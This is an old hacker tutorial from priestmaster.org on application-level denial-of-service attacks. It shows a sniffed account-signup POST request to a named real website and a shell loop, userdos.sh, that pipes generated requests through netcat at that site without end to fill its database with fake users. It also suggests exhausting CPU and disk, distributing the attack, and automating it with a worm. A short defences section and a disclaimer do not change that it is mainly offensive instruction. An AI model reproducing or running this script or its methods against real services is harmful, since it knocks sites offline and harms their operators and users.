-------- "How to perform application level Denial of Service attacks" ---------
------------------------------- Version 0.2 -----------------------------------
----------------------- http://www.priestmaster.org ---------------------------
-------------------------<priest@priestmaster.org> ----------------------------

!!! THIS FILE IS FOR EDUCATIONAL PURPOSE ONLY AND SHOULD NOT BE USED TO !!!
!!! ATTACK COMPUTERS WITHOUT PERMISSION FROM THE SYSTEM ADMINISTRATOR.  !!!


* Legend:
  > is input
  < is output
  * is new chapter


* What is an application level Denial of service Attack ?
  
  Application level DoS attacks, are like normal DoS attacks, but against
  databases, http protocol, cgi-scripts, and all other application layer
  stuff. A good paper about theorethical Application layer DoS is at [1].
  My paper covers some real attack methods.


* What do we need to perform such attacks ?

  Some understanding about http/cgi, sql, a programming language, shell
  scripting, netcat utillity (See [2]) and a sniffer (See [3]).
  I use the C programming language, bash scripting, tethereal and a linux
  operating system, but you can attack with every operating system,
  with a compiler/interpreter, netcat and a sniffer (Cygwin for windows,
  or Active perl, netcat and ethereal is a good platform if you use windows).


* Ways to fillup the remote database

  All values, which are stored in a database or written to a file and which
  are user-supplied are points to attack. If you get a popup, which asks you
  a question, you can send many automated entries for example (Sometimes it's
  possbile to manipulate a voting system or a lottery). Search for http GET and 
  POST requests, which send some user supplied data to the webserver/database.
  I found an example at http://mind.sputnik.pl/new-user. Surf to this page
  with your browser, switch to another terminal and launch a sniffer (I use
  the terminal based sniffer from the ethereal package (tethereal. See [3]),
  because tcpdump -w won't work on my computer):

  > tethereal -i ppp0 -w dump  
  
  Now switch to your browser and enter valid email and passwort. Switch
  to the ethereal terminal and list the http POST request:

  > strings dump

  ...
  < POST /new-user HTTP/1.0
  < Host: mind.sputnik.pl
  < Accept: text/html, text/plain, application/x-gunzip, application/x-gzip, applicaAccept-Encoding: gzip, compress
  < Accept-Language: en
  < Pragma: no-cache
  < Cache-Control: no-cache
  < User-Agent: Lynx/2.8.3dev.9 libwww-FM/2.14
  < Referer: http://mind.sputnik.pl/new-user
  < Content-type: application/x-www-form-urlencoded
  < Content-length: 69
  <
  < email=bernd@brot.de&password=geheim&repeat_password=geheim&stage=save
  ...

  If you send this post request, you create a new user, but user bernd@brot.de
  already exist, because we have created it before. You need another name for
  your next account. We need a program, which create automated POST requests
  with random usernames, passwords and a function, which calculate the
  Content-length for the new usernames and passwords to fill up the database
  with many fake users. userfillup.c in this package is an example program
  against mind.sputnik.pl, which generates random usernames and passwords POST
  requests. We can send this POST requests with netcat automatically and many
  times (See userdos.sh, which starts the DoS attack against mind.sputnik.pl):

  > cat userdos.sh

  < #!/bin/sh
  < while /bin/true
  < do
  < ./userfillup | netcat mind.sputnik.pl 80
  < done

  DoS mind.sputnik.pl is really easy, because we only need one post request to
  create a new user. Normally you need more complex handling (You have to
  set a cookie, pass some questions, the use of many formulas, waiting for a
  timeout, ...) if you can do it with your web browser, you also can do it
  automated.


* Generic Apl. DoS attacks

  You can call procedures in cgi-scripts (very often or endless), which makes
  complex mathematic or any other calls, which gain much CPU time
  (cryptography for example). Often, you can trigger some conditions like an
  endlessloop or a segfault with a specialy crafted packet (Search for DoS
  exploits with google: |"DoS exploit" site: http://packetstormsecurity.org|
  (Only use the string between | and |)). If user data is written to a file,
  you can gain disk space. Be creative. If you can't gain access to a computer
  simply DoS it. DoS attacks are nearly always possible. 


* How to prevent such attacks ?

  1. Set a timeout for the response every request was made by the
     same IP address (Webserver).
  2. Do not store to much data from the same IP address (Session ID's,
     usernames, ...).
  3. Do not store to much cookie values from one IP in the database.
  4. Graphical banners, which includes graphical characters, which the user
     have to input. Automation isn't possible. (It is sometimes possible with
     OCR systems).


* How to attack webservers, which sends delayed http requests or which
  only store less entries per IP address?

  If the delay time is client-based (Jscript, JavaScript, ...), it's worthless,
  because you do not interprete the script code if you send raw GET and
  POST requests. Apl. DoS attacks (and normal DoS attacks) are more effective,
  if you have many computers with different IP addresses, which attack only
  one destination. You can combinate Apl. DoS with normal DoS attacks
  (synflood, Rose fragmented attack, ...) or write a computer worm, which
  performs the attacks automatically.  


* Conclusion

  Apl. level DoS attacks are very effective, because you don't need very
  much bandwidth. A simple specially crafted package, or resend of some 
  user data is enought to cause a damage and it's really difficult
  (or impossible ?) to prevent against all types of DoS attacks. If you
  have fair comments or you find some mistakes (There are many in this paper),
  mail me <priest@priestmaster.org>. I'm from austria and I cannot write
  english very well. I hope you understand me and the basic concepts about Apl.
  DoS exploitation (After you read this paper). 
  

-----------------------------------------------------------------------------

* Links

  [1] Theorethical paper about Application level DoS attacks
      http://packetstormsecurity.org/papers/attack/ApplicationLevelDoSAttacksv06.pdf 

  [2] Netcat and many other good utillities
      http://www.atstake.com/research/tools/network_utilities/

  [3] The ethereal sniffer homepage
      http://www.ethereal.com
